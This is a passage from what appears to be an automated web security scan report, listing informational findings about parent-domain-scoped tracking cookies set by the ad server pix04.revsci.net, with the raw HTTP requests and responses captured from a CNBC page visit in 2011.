Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwfrETCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXo2Tdpd3/peMQJM7SPf8uGKsMu/NnIXoCKOuMJ7ElYQvOVL9t9SMAV/7PjSKU8ZyX7SbtvP/rThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhLtGNteye5yii13Q4OdeSFKbr5jiaqKgvgvBJdkXGm510JiYUad7XLzduZCr/JxqLNImhq46QiBAaz+//8WqGERGMitWz+x0mmzhlaVCaVmYgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKEMvqW6SsMTBCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdqHjM7TW4vZKHdpJ1KXdLpe1PQ72hrFn/8I2DKcTrIFCkopzHCkkdlSH/12pK3/BLhkQsrZH5FpXMV5z7hZpF/VfEDWXZ5TRm0IlbP8z1KB5y9zBus/K4s6INaHh4ssltHk7xsqAU4HQyLZuiOWyBijKhvPh+q+HMu+4V9pewc+aosfPpiUVrT5/IXE8TaK+asU5xfX/5RECzSnBWhBiMHG/JhpNGkSgZl9KYAvHyF+m4l70RCkw2yK0lsDhW; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:12:35 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:12:35 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.136. http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/242178359.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N/BUnLo4ivqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/011PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS1SBx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9eVFn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:50:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/242178359.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_GXWN="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBj4lmJKbjeS1EvCP96oXW6n67MhFn371MBxTlzs5vkNcghgKhJDkjfH8oh8yRi/RCdSAZbrYd7PhnhGKam4V8RKOGhNKmHSBoOqlL0vxCEEJO8k28rn/CeVVOYFMjNfA8ShCGNzIbLMPrb58kocylkv9Wlf3FYrrNEgQceQqMqHHcmBdNUo+aMKOvU1m6wxQCQKib5NlMsUT6WRbkSQwSoTFMO8NNu74AOvfMuVcIzQ0gHCiX3hnyu4Mn0pnLsGNF1OMQCDkPsfODOCrOLiEXw3O9Vb3UcKHUY2Spy0ZbWL+/Bi6HOeJC+PbnFt+ljYVTItKLMP362VYnUyX1/VRMOeB/a0+NhbjPrbUoxwkac24NqYOzE32mIxyawgJ3oQxCbtz6jgCebqMna4/FpTqTCYvYfXr3Uw36/yb2NYWdzFHh2eBs+aQ9WXabD9pWSbRO+jlsbRNPqx7UL8WGT98QPt8DNc2/awuMnFHdqQpirnndn8cBcLAOwMm+JfzgcjqQx8in9THyegOXGEi/OsjeCJmTOM2FavSBajcJVTo1kpQi11FFLSIYUpgmj3pguehownZrXmTeNNDU7ufQoD3NuWLPeewbZrcVv3b3kx9d5Po3PrG6JL+BMqXNVj1Z7kxBK9Ce77N+Zxe2voGi7SGUZsokbHaKnRKHrC+d1Y1WQB/4ngQcxalpR2aHgKfa39wNQL1iRxR7p946PXCgIFV/Gcq3JsJAkq4cjFPCrP8Iuoz/CLsE7SXYRyqgdixLiQEfW5a7kFNERgYY8qxYjQySXH6ndHYSrz6Kvitf7dD7HXOwVIzRkbfIrkxYHCz380z0NrdcFo6Pf6JgtdepggFL1HSwe53rGpLU0cokk+b7txciqNpIGQs3bBh8YmMnZ/KbFJe2cPcX5bR4Z3OO/SoYugcKofD+IpniJd6xqWFh2w3lS2fXYgSInda8j+DU7c+Q9sbeakR5VujQFGdJbE9DLrHGoVX6TNyrEJCF2ZszL5FA2E+o/PiOFlVjugaEhC91tcLPvTO1fUjpJ67A8tqfUW8x3iMuN+vOahZTR0Oq5sXHAdEh1ODj/gBs7egJ0OvAqFCrlIWc2hT64sQ3CGWeTZkkwZkQABWzw/6dhTEmCS3hW2oU5GRZUl4hZ/+YSD2bDiQyBNWVOB48mzZ26aeckLfcMHhTyWP9ccUFNoHywOn4Y9EaugjDrTuwnv1gMyLQyG50kkCNX8Y4ccFsLLKgGXoENIC3+4OpB2E0SSC1+TWtYooS/UEEqf0W7Wjljul1FM3M9/JV2c1Oi7qHLR7/KzLSwXXfb1jg="; rsi_us_1000000="pUMN4ymnMBYY7dXKYa7+itFLgvM/u/LBmb+24q2tXEpJiFT0/ChXTUHNBmbDd46t2hFxDCMVaHOYll5WmoR431FhyPzXR27K7zqiDuJ/zTlJnHw6qG/WXHtOQfXO7stZRMQ4v1NgNiHhq5ROqnJrdqChH7WY0QbTf5R+dnWDAc1Pbw5/b6RTLpLHembgsnY2Ux04NpeUlqGPYPHHIaLif3c4kdcaYs7U7RqG6XLoB4TPLZW1UoBkdUnRcMRXELutAYdOXY9DQtr1JxLtIxJ+X9R+3HjefVdCdO6dpAYgyZDa/uEDPF/vHf/G7WXxx0zvdwtuNphbF01XvwDtCkOuGNwy+zqtXO9w2n2QgjP5OKSdL+gsqoo3L8t7KNxdRgVAaBE55UDUPe2e3u+x1KMFVQ5qry9LeRiJbLvfs8EJ6iT0mh57YRnjb2VFMd/zbpDKUEPwit19GsWo0+iOJfDbhyrZddoKEiEKt7fdXDXdO5fxLd8UinkgWsQK26QdKSsOJ+6f+uL0AG6aIyOvwnPjP62RNI6Xh9gBpHxiwFoek7uaZcw2UfA4nqiGPBqXiZ73DQLzhls5qc0t1wNSJkwWYHlNVMDXrbHlqk0sUTQVFsefgRxUx9VT7/AF+HUF/jes++Sb4iwpmuZigORL9n0ac93Xn9fUNZnBt2CVEsYPu0P6QOdcEcncN0qmv5QSnQjfldbyWEomRDDlsA1xahyXMlz9O+43gH/r3cObHVJUnJhAZKhlGkZ3hYINyQcOQyP1GczivmyKXtOQlt9OjnyjC6LA8wBNQWF7g+jCIqIp0AaoNgXKncwDF/Bhs+k4OD5OLvdbhGZ9RY8waHoDhHUjg0dim3Oftt1YtQ37wsWw8GrOnHRih4pN5AGPMwk+EIQ2IEo1vODtNaHgiO9jLdK+MSFl7A/LqTBidafZZHp77JyJAcHHE3bguJ5Isv+zBhAOoGwLwmHi/7gga/7zkITMFuOa2ddaqPZtEhaodMYXugDe/2BwcaSDZRWVhumlgkl/KE7+hzW3AQbwNo5GK119XpLwbP5I7zLV2DiI0KjNdUAHzFvr1LcOKoAK60KkJzdKe4745ER3JUUeff+ZmOm1Atnk46G76zyAvu1lnBpFcMhmPPAIrSbRdZ/bYhbjh5FR9/ucZWyfnDBaiNquVzBBWz4dmaO3u1fGaT6mUgs3oWihlZszZEnSF8tSZMVccG4Eh1BlzSioU9G/b7JPUZ9X8KGdmF4b6slsoKDcBKqJFydhC7bAYIMbxqbO8k0oIo8LbgWdeQxMPdxLvA/Rn4T8rMqEI0MK3HgGN3McAvWbNuCUSH/zw80fYswUkrmS4yAYXFKcsRGnJocGHjE6TA0qBrOFq5qaEpSWFmiL/Mbxr9UiL1jYSH+A8o28THaIiSgrNirXjlyaBCbw7agBP1RRKx3jq1jfktlmUlr2gJg8VhTqlnYnjnLItOn9guvzRqnT/rBtJ9dTQBQ/ZTO4yi/5NVSS4n/cpUwv47dLwM1cnHcDmcjhIsuRXGFTW++UUehIH8cyIDcr8jzpifaIJAzP8D4tr7zH1NFv7Jz1OwYWOFaohvSYo603YXqSkafHVfeqYN3DJcPiZcNd8/BESFxiibEY8fdTfj47ojqAd6idowPuKxk3u71teXHYkMKqZJh9fhJxBAeQt2flUOS4e5KUOraZ14026A5OU5X5KkPBMN/qOaZnNYsTEXw/JSpfTJ405HWyT4VU/j92Wv6Z0BlXpCX0Zlei9Qw4VRSnRWip9FhQb+ZkDTq4X94UydJiX4kI4pE="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQm8locHcCtpU+w6+9L5G+51oBVUZ75smbLZJtOP/GhmELDb2WDbVjI5teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa0ATFgWdPtKIFHNv4PL1RUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKuRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHVwaNKdWI3SWQJ9zzYJE3gOggYzS8l60cF2fRhYKZWrEcWW0BvTeT4FW1ruM7/GaXYHlxlcxlY9e55vKxtpoLjzvvQb5Y6HUaMyYyUAGUmARBH06niprUVplmRiiyPcKx/IuH584Rk7smRfc3CFuvdQc0Syy+EOVpga9CywpqHZlvqj+Yohz/3vpGN97XrVdyefZUfP9jCJxgmG3gwIgREVXsV3r77PFk/TNCupRC8alM6fI3au2NcxoEMczZyl5ypJ5fIiSvgiW8SQGEwvBn/Fdna5uiSwGs/9ybMUI111meYQdcxpqi3rXmYq4zd2z107N7/opFdY48Uhnimej3meys4F4nYE0AvW4SLKLyHlMvpQvwLk8hY7tACasJCqYrhKVB7tYuNczQIFrFamQPeTR07MyvqfFzvfEMkk/NPpt7P5DLZO2jMM5n5w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QAw2+BGP/IHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyd2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcux4KUMU5DOxQMhV4Tshw0N/BUnLo4ivqbsg1bsFf/EAjzsKiPsit9AWItahN6MF3lGdujWLhcFieltwL7L/pzSjuwHe0eOJ5r/PIDwXoO5EfumIpbnOMVAzY+r4QldWREX7N2+E2jk5TgfLCLlvZv1DD8IN3FL+PH/zwFTCcROvLm2k07/vimX/+X2HlNIQ60LZeoZK0RPHkiGU8HXulrRq1a+eM9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTwjt1/011PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS1SBx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9eVFn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:50:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:50:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.137. http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/252539645.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D0WTbuOuqwzrTh6D07lJMXkAZBhiSC8XdnKccC9ridpZlYwlDrMd+Xsw4jfPzK/1xf0zWwMrA/z4+adSy8AQ+/bPvWVHlEOkSUWbhx4koFoXhdxjg793faLYGuBz9dgMCEDIzrrOaF+82xyu13GX8yqklpeilr7fO5GXUyZ9/JI9p102eUI7O1KiczNpQSIk0ZtC1Vx48kZ0cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+TonH9N3g785XpchwMSTNEkg72LuQq7hJcS8A8P0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:16:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/252539645.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; 